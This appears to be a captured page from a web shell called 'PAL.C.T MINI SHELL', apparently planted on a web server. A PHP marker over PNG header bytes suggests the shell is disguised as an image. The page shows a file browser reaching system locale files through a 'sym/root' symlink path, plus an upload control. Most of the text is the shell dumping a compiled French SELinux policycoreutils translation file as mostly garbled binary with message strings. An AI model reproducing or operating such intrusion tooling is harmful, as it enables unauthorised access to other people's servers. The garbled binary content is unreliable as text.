php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /var/www/html/sub/images/sym/root/usr/share/locale/fr/LC_MESSAGES/
upload
files >> /var/www/html/sub/images/sym/root/usr/share/locale/fr/LC_MESSAGES/policycoreutils.mo

,<*h8i8}8888?8;9&O99v99997:?:C:L:`:s::::::::::;+;<;U;/^;;;;;G;E<$M<)r<M<5<) =lJ=)==2=L2>K>>">
?(?!G?'i?D?B?@A@@4A&7A,^A%A2AAKB5MBTB<BLC(bC,CPC2	D.<DJkD%D(D4E:E]VECE(E!F$FF%G-=GLkGxG1H(=HfHH2HHHH2H#I1<I2nII I"IIJAL
L
MMP&MwMM!MM"MN$NCN-`N%N(N1N*O2:O(mOO%O$OO P>P[P"{P$P!PP%Q'Q GQ hQQQ$QQ%R'R$CRhR$R'RRRS+S@SXSuS"SSS S T'T @TaTzT$TT%TTU3UKU#kUUUUU5V7VVV!uV(V!V"V!W&'WNW$hW/W/W4W2"XUX?oX$X)X)X.(Y,WY)Y)Y.Y,Z)4Z)^Z.Z,Z$Z!	[+[)G[q[v[
[[	[	[[[[\\
\-)\(W\)\2\2\-]*>]*i]%]%]*].^,:^/g^$^/^+^-_+F_+r_'_$_,_-`0F`.w`+`0`4a+8a(da)a+a,a+b#<b%`b#b)b,b+c+-c+Yc-c+c-c-
d.;d(jd-d/d.d$ e)Ee)oe.e-e*e*!f/Lf-|f*f.f2g+7g*cg.g*g0g+h-Eh-sh+h-h,h+(i,Ti)i*i)i&j+'j,Sj*j,j,j+k-1k*_k*k*k*k)l*5l%`l/l-l)l&m/5m-em/m&m0m#n-?n-mn*n)n%n+o-Bo+po$o(o*o*p$@p0ep-p*p#p+q/?q3oq.q&q4q+.r.Zr*r+r+r+s,8s+es/s+s)s-t*Et*pt-t/t)t,#u+Pu/|u0u*u)v.2v-av+v,v.v-w)Ew*ow)w)w,w,xHxQx1px:x9xNyfyxyWy	y2yJz<ezz zz"z+{&K{r{+{#{{!{%|<|X|!u| | |F|
 }+}
?}M}k}	~}}
}}	};}"~%~,~0~6~
Q~
\~j~v~4~~~ ~6Jenw	

<#X	|	

Āր	
+G%SGýӁׁہ'@Ym	

ʂς27C8T8ƃ̓փ!9Wv&Ƅ"(HMbЅ
!<Ibo:7ˆ"@DJcp,FJ&:'<GH($ˊ05O6̋ҋqY`~|,*׍'.*3Y42Ž4E*p'*)R|",	'<Xq}*ܑ'"'Jr]
	rUv̓	.$*S~L%C4_<ѕ0!-_1,4֖#,/(\("ė9PlǘϘטߘ"*#G7k$ڙ#"F 7Xt]^;NL)םI7Kž۞
''On=!ğ<AKXĠӠomb3С3i8=D%?ɣ-	F7z~y3s=96IV6hצ[@aG6@7!*YBFǩ.y=TOz<d@~Ya@x@uCQGL}`?s?GE8G~zƲA	1(FIO ʴ@δ.L>O6۵./Aqtgo~Q+!3:#n'"*ݻ(>14p5Eۼ0!@R4'Ƚ/2 %S(y((˾+3 (T$}+'ο&.$L&q6&S%J6p"&+%(C+l$%.&59!o!31!-;#i'5%)$;"`$16&%8)^-J+,-4Z778086i(5KIKJI%*SP5EC DdCDB2CuBJHGIH0#-T+3
(: Gh>9044e==52L;--59M7:,:'6b866	/@,p48;9G6;76,0c46768+o-+47*6b6686@8w890#8T:9,4/4d9852B7u859>V6595<;r6886W866754m54.
6<7s5776Q8555-5c45-728j4.:8B:{.;+!8M854-*6X86,0,2]5,88,5e+6:>99x.?6!9X566667m6:64N8558(@a4763F;z549!8[6798=4v2447H7 8FBea
"|27kWZ!)2)11[6&92%+X08!',4T3R =.SY0^0
M&!t$G":CO#o7?{_1

'+0?Na'u(=0:HM
#$H(g	2 7HXES6
		 )* Jk3% D5z5,,YkHV[#( 	*BM\I4ar=	5
N
c5'$ =HUCH+
@
"F
i
*!2L@:AX9XO-P}NPJn5:'1&1X40#AQp"$5	.'8V%@Xnp,#$J8V R:O	S,]$FW'N4v

#XA|4#6>N, 1*
#8"\&,+&	FP]jw/$)
 Y7     *     !2!Nk	je~a!l@1CIc&jh'2,;<B(0F]4po%=vs(9/l{y%bC1iCX:$%|ffTHK@7IQ
GH
)s)W&3m.DI]T"vAh5 66F
a
k80uu|RY'*$4zOe !mG8beZq^wS!|YZ
sJzKi5kO(-
Gw*.VUE>;JczV-}=E\PY-+{P1$p<dX,Rg2t[rqU`g<@j^QwS_J+}yFxqyD	B ?xr0i~n_MaK.Tl~v>Sn:UfA+rNn3B_[9)`"dERW]LO5g8?pt\*`bhH>c3N[xu?}6#DM2ZQPo#M#Ad'4o/=/^7\	W,":LtVX;m&L{79%s changed labels.
%s is already in %s%s is not a valid context
%s is not in %s%s must be a directory%s!  Could not get current context for %s, not relabeling tty.
%s!  Could not get new context for %s, not relabeling tty.
%s!  Could not set new context for %s
%s:  Can't load policy and enforcing mode requested:  %s
%s:  Can't load policy:  %s
%s:  Policy is already loaded and initial load requested
******************** IMPORTANT ***********************
...600-1024<b>Applications</b><b>Login Users</b><b>Root Users</b><b>Select:</b><b>TCP Ports</b><b>UDP Ports</b>AddAdd %sAdd Booleans DialogAdd File ContextAdd Network PortAdd SELinux Login MappingAdd SELinux Network PortsAdd SELinux UserAdd SELinux User MappingAdd UserAddr %s is defined in policy, cannot be deletedAddr %s is not definedAdminAdmin User RoleAllAllow SELinux webadm user to manage unprivileged users home directoriesAllow SELinux webadm user to read unprivileged users home directoriesAllow Samba to share nfs directoriesAllow Spam Assassin daemon network accessAllow X-Windows server to map a memory region as both executable and writableAllow all daemons the ability to use unallocated ttysAllow all daemons to write corefiles to /Allow cdrecord to read various content. nfs, samba, removable devices, user temp and untrusted content filesAllow clients to write to X shared memoryAllow daemons to run with NISAllow evolution and thunderbird to read user filesAllow gadmin SELinux user account to execute files in home directory or /tmpAllow guest SELinux user account to execute files in home directory or /tmpAllow java executable stackAllow mount to mount any directoryAllow mount to mount any fileAllow mplayer executable stackAllow normal user to execute pingAllow pppd to be run for a regular userAllow privileged utilities like hotplug and insmod to run unconfinedAllow programs to read files in non-standard locations (default_t)Allow rc scripts to run unconfined, including any daemon started by an rc script that does not have a domain transition explicitly definedAllow regular users direct mouse access (only allow the X server)Allow rpm to run unconfinedAllow sasl authentication server to read /etc/shadowAllow spamd to access home directoriesAllow squid daemon to connect to the networkAllow ssh logins as sysadm_r:sysadm_tAllow ssh to run from inetd instead of as a daemonAllow ssh to run ssh-keysignAllow staff SELinux user account to execute files in home directory or /tmpAllow staff Web Browsers to write to home directoriesAllow staff_r users to search the sysadm home dir and read files (such as ~/.bashrc)Allow stunnel daemon to run as standalone, outside of xinetdAllow sysadm SELinux user account to execute files in home directory or /tmpAllow sysadm_t to directly start daemonsAllow the mozilla browser to read user filesAllow unconfined SELinux user account to execute files in home directory or /tmpAllow unconfined to dyntrans to unconfined_execmemAllow unlabeled packets to flow on the networkAllow user SELinux user account to execute files in home directory or /tmpAllow user to connect to mysql socketAllow user to connect to postgres socketAllow user to r/w noextattrfile (FAT, CDROM, FLOPPY)Allow user to stat ttyfilesAllow user_r to reach sysadm_r via su, sudo, or userhelper. Otherwise, only staff_r can do soAllow users to control network interfaces (also needs USERCTL=true)Allow users to execute the mount commandAllow users to run TCP servers (bind to ports and accept connection from the same domain and outside users)  disabling this forces FTP passive mode and may change other protocolsAllow users to run the dmesg commandAllow users to rw usb devicesAllow xdm logins as sysadm_r:sysadm_tAllow xen to read/write physical disk devicesAllow xguest SELinux user account to execute files in home directory or /tmpAllow xinetd to run unconfined, including any services it starts that do not have a domain transition explicitly definedApplicationAre you sure you want to delete %s '%s'?Bad format %s: Record %sBooleanBoolean %s is defined in policy, cannot be deletedBoolean %s is not definedBoolean NameCVSCan not combine +/- with other types of categoriesCan not have multiple sensitivitiesCan not modify sensitivity levels using '+' on %sCannot find your entry in the shadow passwd file.
Cannot read policy store.Change process mode to enforcingChange process mode to permissive.Changing the policy type will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?Changing to SELinux disabled requires a reboot.  It is not recommended.  If you later decide to turn SELinux back on, the system will be required to relabel.  If you just want to see if SELinux is causing a problem on your system, you can go to permissive mode which will only log errors and not enforce SELinux policy.  Permissive mode does not require a reboot    Do you wish to continue?Changing to SELinux enabled will cause a relabel of the entire file system on the next boot. Relabeling takes a long time depending on the size of the file system.  Do you wish to continue?CompatibilityConfigue SELinuxContextCopyright (c)2006 Red Hat, Inc.
Copyright (c) 2006 Dan Walsh <dwalsh@redhat.com>Could not add SELinux user %sCould not add addr %sCould not add file context for %sCould not add interface %sCould not add login mapping for %sCould not add port %s/%sCould not add prefix %s for %sCould not add role %s for %sCould not check if SELinux user %s is definedCould not check if addr %s is definedCould not check if boolean %s is definedCould not check if file context for %s is definedCould not check if interface %s is definedCould not check if login mapping for %s is definedCould not check if port %s/%s is definedCould not close descriptors.
Could not commit semanage transactionCould not create SELinux user for %sCould not create a key for %sCould not create a key for %s/%sCould not create addr for %sCould not create context for %sCould not create context for %s/%sCould not create file context for %sCould not create interface for %sCould not create key for %sCould not create login mapping for %sCould not create port for %s/%sCould not create semanage handleCould not delete SELinux user %sCould not delete addr %sCould not delete boolean %sCould not delete file context for %sCould not delete interface %sCould not delete login mapping for %sCould not delete port %s/%sCould not delete the file context %sCould not delete the port %sCould not determine enforcing mode.
Could not establish semanage connectionCould not extract key for %sCould not list SELinux modulesCould not list SELinux usersCould not list addrsCould not list booleansCould not list file contextsCould not list interfacesCould not list local file contextsCould not list login mappingsCould not list portsCould not list roles for user %sCould not list the file contextsCould not list the portsCould not modify SELinux user %sCould not modify addr %sCould not modify boolean %sCould not modify file context for %sCould not modify interface %sCould not modify login mapping for %sCould not modify port %s/%sCould not open file %s
Could not query addr %sCould not query file context %sCould not query file context for %sCould not query interface %sCould not query port %s/%sCould not query seuser for %sCould not query user for %sCould not remove permissive domain %s (remove failed)Could not set MLS level for %sCould not set MLS range for %sCould not set SELinux user for %sCould not set active value of boolean %sCould not set addr context for %sCould not set exec context to %s.
Could not set file context for %sCould not set interface context for %sCould not set mask for %sCould not set message context for %sCould not set mls fields in addr context for %sCould not set mls fields in file context for %sCould not set mls fields in interface context for %sCould not set mls fields in port context for %s/%sCould not set name for %sCould not set permissive domain %s (module installation failed)Could not set port context for %s/%sCould not set role in addr context for %sCould not set role in file context for %sCould not set role in interface context for %sCould not set role in port context for %s/%sCould not set type in addr context for %sCould not set type in file context for %sCould not set type in interface context for %sCould not set type in port context for %s/%sCould not set user in addr context for %sCould not set user in file context for %sCould not set user in interface context for %sCould not set user in port context for %s/%sCould not start semanage transactionCould not test MLS enabled statusCouldn't get default type.
Create/Manipulate temporary files in /tmpCronCurrent Enforcing ModeCustomizedDBUS System DaemonDatabasesDelete %sDelete File ContextDelete Network PortDelete SELinux User MappingDelete UserDescriptionDisable AuditDisable SELinux protection for Cluster ServerDisable SELinux protection for EvolutionDisable SELinux protection for Hal daemonDisable SELinux protection for NIS Password DaemonDisable SELinux protection for NIS Transfer DaemonDisable SELinux protection for NetworkManagerDisable SELinux protection for ThunderbirdDisable SELinux protection for acct daemonDisable SELinux protection for amandaDisable SELinux protection for amavisDisable SELinux protection for apmd daemonDisable SELinux protection for arpwatch daemonDisable SELinux protection for auditd daemonDisable SELinux protection for automount daemonDisable SELinux protection for avahiDisable SELinux protection for bluetooth daemonDisable SELinux protection for canna daemonDisable SELinux protection for cardmgr daemonDisable SELinux protection for ciped daemonDisable SELinux protection for clamd daemonDisable SELinux protection for clamscanDisable SELinux protection for clvmdDisable SELinux protection for comsat daemonDisable SELinux protection for courier daemonDisable SELinux protection for cpucontrol daemonDisable SELinux protection for cpuspeed daemonDisable SELinux protection for crond daemonDisable SELinux protection for cups hplip daemonDisable SELinux protection for cupsd back end serverDisable SELinux protection for cupsd daemonDisable SELinux protection for cupsd_lpdDisable SELinux protection for cvs daemonDisable SELinux protection for cyrus daemonDisable SELinux protection for dbskkd daemonDisable SELinux protection for dbusd daemonDisable SELinux protection for dccdDisable SELinux protection for dccifdDisable SELinux protection for dccmDisable SELinux protection for ddt daemonDisable SELinux protection for devfsd daemonDisable SELinux protection for dhcpc daemonDisable SELinux protection for dhcpd daemonDisable SELinux protection for dictd daemonDisable SELinux protection for distccd daemonDisable SELinux protection for dmesg daemonDisable SELinux protection for dnsmasq daemonDisable SELinux protection for dovecot daemonDisable SELinux protection for entropyd daemonDisable SELinux protection for fetchmailDisable SELinux protection for fingerd daemonDisable SELinux protection for freshclam daemonDisable SELinux protection for fsdaemon daemonDisable SELinux protection for gamesDisable SELinux protection for gpm daemonDisable SELinux protection for gss daemonDisable SELinux protection for hostname daemonDisable SELinux protection for hotplug daemonDisable SELinux protection for howl daemonDisable SELinux protection for http suexecDisable SELinux protection for httpd rotatelogsDisable SELinux protection for hwclock daemonDisable SELinux protection for i18n daemonDisable SELinux protection for imazesrv daemonDisable SELinux protection for inetd child daemonsDisable SELinux protection for inetd daemonDisable SELinux protection for innd daemonDisable SELinux protection for iptables daemonDisable SELinux protection for ircd daemonDisable SELinux protection for irqbalance daemonDisable SELinux protection for iscsi daemonDisable SELinux protection for jabberd daemonDisable SELinux protection for kadmind daemonDisable SELinux protection for klogd daemonDisable SELinux protection for krb5kdc daemonDisable SELinux protection for ktalk daemonsDisable SELinux protection for kudzu daemonDisable SELinux protection for locate daemonDisable SELinux protection for lpd daemonDisable SELinux protection for lrrd daemonDisable SELinux protection for lvm daemonDisable SELinux protection for mailmanDisable SELinux protection for mdadm daemonDisable SELinux protection for monopd daemonDisable SELinux protection for mrtg daemonDisable SELinux protection for mysqld daemonDisable SELinux protection for nagios daemonDisable SELinux protection for named daemonDisable SELinux protection for nessusd daemonDisable SELinux protection for nfsd daemonDisable SELinux protection for nmbd daemonDisable SELinux protection for nrpe daemonDisable SELinux protection for nscd daemonDisable SELinux protection for nsd daemonDisable SELinux protection for ntpd daemonDisable SELinux protection for oddjobDisable SELinux protection for oddjob_mkhomedirDisable SELinux protection for openvpn daemonDisable SELinux protection for pam daemonDisable SELinux protection for pegasusDisable SELinux protection for perdition daemonDisable SELinux protection for portmap daemonDisable SELinux protection for portslave daemonDisable SELinux protection for postfixDisable SELinux protection for postgresql daemonDisable SELinux protection for pptpDisable SELinux protection for prelink daemonDisable SELinux protection for privoxy daemonDisable SELinux protection for ptal daemonDisable SELinux protection for pxe daemonDisable SELinux protection for pyzordDisable SELinux protection for quota daemonDisable SELinux protection for radiusd daemonDisable SELinux protection for radvd daemonDisable SELinux protection for rdiscDisable SELinux protection for readaheadDisable SELinux protection for restorecondDisable SELinux protection for rhgb daemonDisable SELinux protection for ricciDisable SELinux protection for ricci_modclusterdDisable SELinux protection for rlogind daemonDisable SELinux protection for rpcd daemonDisable SELinux protection for rshdDisable SELinux protection for rsync daemonDisable SELinux protection for saslauthd daemonDisable SELinux protection for scannerdaemon daemonDisable SELinux protection for sendmail daemonDisable SELinux protection for setransDisable SELinux protection for setroubleshoot daemonDisable SELinux protection for slapd daemonDisable SELinux protection for slrnpull daemonDisable SELinux protection for smbd daemonDisable SELinux protection for snmpd daemonDisable SELinux protection for snort daemonDisable SELinux protection for sound daemonDisable SELinux protection for soundd daemonDisable SELinux protection for spamd daemonDisable SELinux protection for speedmgmt daemonDisable SELinux protection for squid daemonDisable SELinux protection for ssh daemonDisable SELinux protection for stunnel daemonDisable SELinux protection for swat daemonDisable SELinux protection for sxid daemonDisable SELinux protection for syslogd daemonDisable SELinux protection for system cron jobsDisable SELinux protection for tcp daemonDisable SELinux protection for telnet daemonDisable SELinux protection for tftpd daemonDisable SELinux protection for the web browsersDisable SELinux protection for transproxy daemonDisable SELinux protection for udev daemonDisable SELinux protection for uml daemonDisable SELinux protection for updfstab daemonDisable SELinux protection for uptimed daemonDisable SELinux protection for uucpd daemonDisable SELinux protection for vmware daemonDisable SELinux protection for watchdog daemonDisable SELinux protection for winbind daemonDisable SELinux protection for xdm daemonDisable SELinux protection for xen controlDisable SELinux protection for xen daemonDisable SELinux protection for xfs daemonDisable SELinux protection for ypbind daemonDisable SELinux protection for ypserv daemonDisabledDisabled
Permissive
Enforcing
Do not allow any processes to load kernel modulesDo not allow any processes to modify kernel SELinux policyDo not allow transition to sysadm_t, sudo and su effectedDo not audit things that we know to be broken but which are not security risksEdit Network PortEnable AuditEnable/Disable additional audit rules, that are normally not reported in the log files.EnforcingEnter complete path for executable to be confined.Enter complete path to init script used to start the confined application.Enter unique name for the confined application or user role.Error allocating memory.
Error allocating shell's argv0.
Error changing uid, aborting.
Error connecting to audit system.
Error dropping SETUID capability, aborting
Error dropping capabilities, aborting
Error freeing caps
Error initializing capabilities, aborting.
Error resetting KEEPCAPS, aborting
Error sending audit message.
Error setting KEEPCAPS, aborting
Error setting capabilities, aborting
Error!  Could not open %s.
Error!  Shell is not valid.
Error: multiple levels specified
Error: multiple roles specified
Error: multiple types specified
Error: you are not allowed to change levels on a non secure terminal 
ExecutableExisting User RolesExisting_UserFailed to close tty properly
File
SpecificationFile
TypeFile Contexts fileFile LabelingFile SpecificationFile TypeFile context for %s is defined in policy, cannot be deletedFile context for %s is not definedFilterGPLGamesGenerate new policy moduleGroup ViewHTTPD ServiceInit scriptInteracts with the terminalInterface %s is defined in policy, cannot be deletedInterface %s is not definedInterface fileInternet Services Daemon (inetd)Internet Services Daemon are daemons started by xinetdInvalid file specificationKerberosLabelingLinux Group %s does not existLinux User %s does not existList ViewLoad Policy ModuleLoad policy moduleLockdown...Login
NameLogin '%s' is requiredLogin NameLogin mapping for %s is defined in policy, cannot be deletedLogin mapping for %s is not definedMCS LevelMCS RangeMLSMLS/MLS/
MCS RangeMLS/MCS
LevelMLS/MCS RangeMemory ProtectionMinimal Terminal User RoleMinimal X Windows User RoleModify %sModify File ContextModify SELinux User MappingModify UserModify an existing login user record.Module %s.pp already loaded in current policy.
Do you want to continue?Module NameMountNFSNISNameName ServiceNetwork ConfigurationNetwork PortNo context in file %s
Node Address is requiredNode Netmask is requiredNot yet implementedOptions Error %s Out of memory!
Password:PermissivePolgenPolicy DirectoryPolicy ModulePortPort %s/%s already definedPort %s/%s is defined in policy, cannot be deletedPort %s/%s is not definedPort NumberPort is requiredPort number "%s" is not valid.  0 < PORT_NUMBER < 65536 Ports must be numbers or ranges of numbers from 1 to %d PrefixPrintingProcess DomainProtoProtocolProtocol udp or tcp is requiredRed Hat 2007Relabel on next reboot.Remove loadable policy moduleRequires at least one categoryRequires prefix or rolesRequires prefix, roles, level or rangeRequires setypeRequires setype or serangeRequires setype, serange or seuserRequires seuser or serangeRevert boolean setting to system defaultRoleRoot Admin User RoleRun booleans lockdown wizardSASL authentication serverSELinux
UserSELinux AdministrationSELinux InterfaceSELinux Policy Generation ToolSELinux Port
TypeSELinux Port TypeSELinux RolesSELinux Service ProtectionSELinux TypeSELinux Type is requiredSELinux UserSELinux booleanSELinux fcontextSELinux policy is not managed or store cannot be accessed.SELinux user %s is defined in policy, cannot be deletedSELinux user %s is not definedSELinux user '%s' is requiredSSHSambaSelect Management ObjectSelect PortsSelect Root Administrator User Role, if this user will be used to administer the machine while running as root.  This user will not be able to login to the system directly.Select directory to generate policy files inSelect directory(s) that the confined application owns and writes intoSelect executable file to be confined.Select file(s) that confined application creates or writesSelect if you wish to relabel then entire file system on next reboot.  Relabeling can take a very long time, depending on the size of the system.  If you are changing policy types or going from disabled to enforcing, a relabel is required.Select init script file to be confined.Select the domains that you would like this user administer.Select the user roles that will transiton to this applications domains.Selinux
File TypeSemanage transaction already in progressSemanage transaction not in progressSends audit messagesSends emailSetup ScriptSorry, -l may be used with SELinux MLS support.
Sorry, newrole may be used only on a SELinux kernel.
Sorry, run_init may be used only on a SELinux kernel.
Spam ProtectionSquidStandard Init DaemonStandard Init Daemon are daemons started on boot via init scripts.  Usually requires a script in /etc/rc.d/init.dStatusSystem Default Enforcing ModeSystem Default Policy Type: This user can login to a machine via X or terminal.  By default this user will have no setuid, no networking, no sudo, no suThis user will login to a machine only via a terminal or remote login.  By default this user will have  no setuid, no networking, no su, no sudo.To make this policy package active, execute:Toggle between Customized and All BooleansToggle between Customized and All PortsToggle between all and customized file contextTransition staff SELinux user to Web Browser DomainTransition sysadm SELinux user to Web Browser DomainTransition user SELinux user to Web Browser DomainTransition xguest SELinux user to Web Browser DomainType %s_t already defined in current policy.
Do you want to continue?Type Enforcement fileType is requiredUSAGE: run_init <script> <args ...>
  where: <script> is the name of the init script to run,
         <args ...> are the arguments to that script.USER Types automatically get a tmp typeUnable to allocate memory for new_contextUnable to clear environment
Unable to obtain empty signal set
Unable to restore the environment, aborting
Unable to restore tty label...
Unable to set SIGHUP handler
Universal SSL tunnelUnknown or missing protocolUnreserved Ports (>1024)Usage %s -LUsage %s -L -l userUsage %s -d File ...Usage %s -l -d user ...Usage %s -l CATEGORY user ...Usage %s -l [[+|-]CATEGORY],...]q user ...Usage %s CATEGORY File ...Usage %s [[+|-]CATEGORY],...]q File ...Use -- to end option list.  For exampleUser ApplicationUser Application are any application that you would like to confine that is started by a userUser MappingUser PrivsUser RoleUser with full networking, no setuid applications without transition, no su, can sudo to Root Administration RolesUser with full networking, no setuid applications without transition, no sudo, no su.Uses Pam for authenticationUses dbusUses nsswitch or getpw* callsVerify NameVersionWarning!  Could not retrieve tty information.
Warning! Could not restore context for %s
Web Application/Script (CGI)Web ApplicationsWeb Applications/Script (CGI) CGI scripts started by the web server (apache)Writes syslog messages	XENXServerYou must add at least one role for %sYou must enter a executableYou must enter a name for your confined process/userYou must enter the executable path for your confined processYou must select a userYou must specify one of the following values: %s_Delete_Propertiesallall files
regular file
directory
character device
block device
socket
symbolic link
named pipe
authentication failed.
cannot find valid entry in the passwd file.
chcat -- -CompanyConfidential /docs/businessplan.odtchcat -l +CompanyConfidential jusererror on reading PAM service configuration.
failed to build new range with level %s
failed to convert new context to string
failed to exec shell
failed to get account information
failed to get new context.
failed to get old_context.
failed to initialize PAM
failed to set PAM_TTY
failed to set new range %s
failed to set new role %s
failed to set new type %s
getpass cannot open /dev/tty
globallabel37label38label39label41label42label44label50label59newrole:  %s:  error on line %lu.
newrole: failure forking: %snewrole: incorrect password for %s
newrole: service name configuration hashtable overflow
offonpppdrsyncrun_init: incorrect password for %s
system-config-selinuxtranslator-creditstypeunknownusage:  %s [-qi]
use_syslog must be a boolean value Project-Id-Version: policycoreutils.HEAD.fr
Report-Msgid-Bugs-To: 
POT-Creation-Date: 2014-10-17 23:48+0000
PO-Revision-Date: 2010-08-04 12:16+1000
Last-Translator: Sam Friedmann <sam.friedmann@redhat.com>
Language-Team: French <trans-fr@lists.fedoraproject.org>
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Language: fr
X-Generator: KBabel 1.11.4
Plural-Forms: nplurals=2; plural=(n > 1);
%s a modifié les étiquettes.
%s se trouve déjà  dans %s%s n'est pas un contexte valide
%s ne se trouve pas dans %s%s doit être un répertoire%s ! Impossible de récupérer le contexte actuel pour %s, le terminal ne sera pas renommé.
%s ! Impossible de récupérer le nouveau contexte pour %s, le terminal ne sera pas renommé.
%s ! Impossible de paramétrer le nouveau contexte pour %s
%s : Ne peut charger la stratégie et le mode d'application demandés :  %s
%s : Ne peut charger la stratégie :  %s
La stratégie %s est déjà chargée et un chargement initial est requis
******************** IMPORTANT ***********************
...600-1024<b>Programmes</b><b>Identifiant de connexion</b><b>Utilisateurs root</b><b>Sélectionnez :</b><b>Ports TCP</b><b>Ports UDP</b>AjouterAjouter %sAjout de boite de dialogue de booléensAjouter un contexte du fichierAjouter un port réseauAjouter les correspondances utilisateurs - identités SELinuxAjouter les ports réseau SELinuxAjouter une identité SELinuxAjouter une correspondance utilisateurs - identités SELinuxAjouter un utilisateurL'adresse %s est définie dans la stratégie, elle ne peut être suppriméeL'adresse %s n'est pas définieAdministrateurRôle de l'administrateurToutAutoriser l'utilisateur SELinux webadm à gérer les répertoires personnels des utilisateurs non privilégiésAutoriser l'utilisateur SELinux webadm à lire les répertoires personnels des utilisateurs non privilégiésPermettre à Samba de partager des répertoires NFSPermettre l'accès réseau au  démon Spam AssassinPermettre au serveur X-Window de considérer une zone mémoire comme exécutable et pouvant être écritePermettre à tous les démons d'utiliser des TTY non allouésPermettre à tous les démons d'écrire des vidages mémoires dans /Permettre à cdrecord de lire de nombreux contenus : nfs, samba, périphériques extractibles, répertoires temp d'utilisateurs et fichiers non dignes de confiancePermettre aux clients d'écrire dans la mémoire partagée de XPermettre aux démons de s'exécuter avec NISPermettre à Evolution et Thunderbird de lire les fichiers utilisateurPermettre au compte d'identité SELinux « gadmin » d'éxecuter des fichiers dans son répertoire « home » ou dans /tmpPermettre au compte d'identité SELinux « guest » d'éxecuter des fichiers dans son répertoire « home » ou dans /tmpAutoriser l'exécution de code dans la pile de JavaPermettre à « mount » de monter n'importe quel répertoirePermettre à « mount » de monter n'importe quel fichierAutoriser l'exécution de code dans la pile de MplayerAutoriser les utilisateurs ordinaires à exécuter la commande « ping »Permettre à un utilisateur ordinaire d'exécuter pppdAutoriser les utilitaires privilégiés comme hotplug et insmod à s'exécuter de manière non confinéePermettre aux programmes de lire des fichiers à des emplacements non standards (default_t)Autoriser les scripts rc à s'exécuter de manière non confinée, y compris tout service qu'ils démarrent et qui n'a pas de transition de domaine explicitement définieDonner aux utilisateurs ordinaires un accès direct à la souris (seul le serveur X a cet accès)Autoriser rpm à s'exécuter de manière non confinéePermettre au serveur d'authentification SASL de lire /etc/shadowAutoriser l'accès de spamd aux répertoires personnelsAutoriser l'accès réseau au démon squidAutoriser l'ouverture de session ssh en tant que sysadm_r:sysadm_tPermettre à ssh de s'exécuter depuis inetd et non en tant que démonPermettre à ssh d'exécuter « ssh-keysign »Permettre au compte d'identité SELinux « staff » d'exécuter des fichiers dans son répertoire « home » ou dans /tmpPermettre aux « Web Browsers » de staff d'écrire dans les répertoires personnelsAutoriser les utilisateurs staff_r à chercher dans le répertoire personnel de sysadm et à lire des fichiers (comme ~/.bashrc par exemple)Autoriser le démon stunnel à s'exécuter de manière autonome, hors de xinetdPermettre au compte d'identité SELinux « sysadm » d'exécuter des fichiers dans son répertoire « home » ou dans /tmpPermettre à sysadmin_t de démarrer directement des démonsPermettre au navigateur mozilla de lire les fichiers utilisateurPermettre au compte d'identité SELinux « unconfined » d'exécuter des fichiers dans son répertoire « home » ou dans /tmpAutoriser les non confinés à faire une transition dynamique en « unconfined_execmem »Permettre aux paquets non étiquetés de circuler sur le réseauPermettre au compte d'identité SELinux « user » d'exécuter des fichiers dans son répertoire « home » ou dans /tmpPermettre à l'utilisateur de se connecter au socket « mysql »Permettre à l'utilisateur de se connecter au socket « postgres »Autoriser l'utilisateur à lire/écrire les noextattrfile (FAT, CDROM, disquette)Autoriser l'utilisateur à effectuer un « stat » sur les fichiers TTYAutoriser user_r à passer sysadm_r via su, sudo ou userhelper. Dans le cas contraire, seul staff_r est habilité à le faireAutoriser les utilisateurs à contrôler les interfaces réseau (il faut aussi que USERCTL=true)Autoriser les utilisateurs à exécuter la commande « mount »Autoriser les utilisateurs à lancer des serveurs TCP (lier à des ports et accepter des connexions d'un même domaine ou d'utilisateurs extérieurs). Désactiver cette option force le mode FTP passif et peut avoir une influence sur d'autres protocolesAutoriser les utilisateurs à exécuter la commande « dmesg »Autoriser les utilisateurs à lire/écrire dans des périphériques USBAutoriser les ouvertures de session xdm en tant que sysadm_r:sysadm_tAutoriser xen à lire/écrire sur des périphériques disques physiquesPermettre au compte d'identité SELinux « xguest » d'exécuter des fichiers dans son répertoire « home » ou dans /tmpAutoriser xinetd à s'exécuter de manière non confinée, y compris tout service qu'il démarre et qui n'a pas de transition de domaine explicitement définieProgrammeÊtes-vous sur de vouloir supprimer %s « %s » ?Mauvais format %s : Enregistrement de %sBooléenLe booléen %s est défini dans la stratégie, il ne peut être suppriméLe booléen %s n'est pas définiNom de BooléenCVSImpossible de combiner +/- avec différents types de catégoriesImpossible de définir plusieurs sensibilitésImpossible de modifier le niveau de sensibilité en utilisant « + » sur %sImpossible de trouver votre entrée dans le fichier des mots de passe cachés.
Impossible de lire la base de données des stratégiesChanger le mode de fonctionnement en appliquéChanger le mode de fonctionnement en permissif.Changer de type de stratégie va entraîner un ré-étiqutage de l'ensemble du système de fichier au prochain démarrage. Le ré-étiquetage est une opération longue dont la durée dépend de la taille de votre système de fichiers. Voulez-vous continuer ?Désactiver SELinux exige un redémarrage. Cette opération n'est pas recommandée. Si vous décidez plus tard de réactiver SELinux, il faudra procéder à un ré-étiquetage du système de fichier. Si vous souhaitez seulement voir si SELinux pose un problème sur votre système, vous pouvez passer en mode permissif, ce qui permet de journaliser les erreurs sans modifier la stratégie SELinux. Le passage en mode permissif ne nécessite pas de redémarrage. Voulez-vous continuer malgré tout ?Changer pour une stratégie active va entraîner un ré-étiqutage de l'ensemble du système de fichier au prochain démarrage. Le ré-étiquetage est une opération longue dont la durée dépend de la taille de votre système de fichiers. Voulez-vous continuer ?CompatibilitéConfigurer SELinuxContexteCopyright (c) 2006 Red Hat, Inc.
